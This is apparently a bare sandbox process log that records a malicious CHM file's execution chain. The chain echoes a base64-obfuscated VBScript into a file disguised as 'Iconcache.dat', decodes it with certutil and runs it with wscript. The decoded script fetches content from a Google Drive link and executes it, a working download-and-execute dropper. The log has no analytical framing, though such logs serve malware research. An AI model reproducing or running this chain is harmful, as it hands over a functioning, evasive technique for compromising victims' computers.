cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "nSJWlP" C:\Users\test22\AppData\Local\Temp\1.chm
3028cmd.exe "C:\Windows\System32\cmd.exe" /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ6U2V0IGluZXN6Y2R3bHBvaiA9IENyZWF0ZU9iamVjdCgiTVNYTUwyLlNlcnZlclhNTEhUVFAiKTppbmVzemNkd2xwb2oub3BlbiAiR0VUIiwgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MU92YmUxc2UzUmg5V0gxTFlUMW9iMW5ncGR0akpXMXlGJmNvbmZpcm09dCIsIEZhbHNlOmluZXN6Y2R3bHBvai5TZW5kOkV4ZWN1dGUoaW5lc3pjZHdscG9qLnJlc3BvbnNlVGV4dCkndGZmeGRkcnNkc3Nhd2R4dmNiZ25oamp1eWpidg > "C:\\ProgramData\\Iconcache.dat" & start /MIN certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"
1324certutil.exe certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"
1220wscript.exe "C:\Windows\System32\wscript.exe" //e:vbscript //b "C:\\ProgramData\\Iconcache.vbs"
2632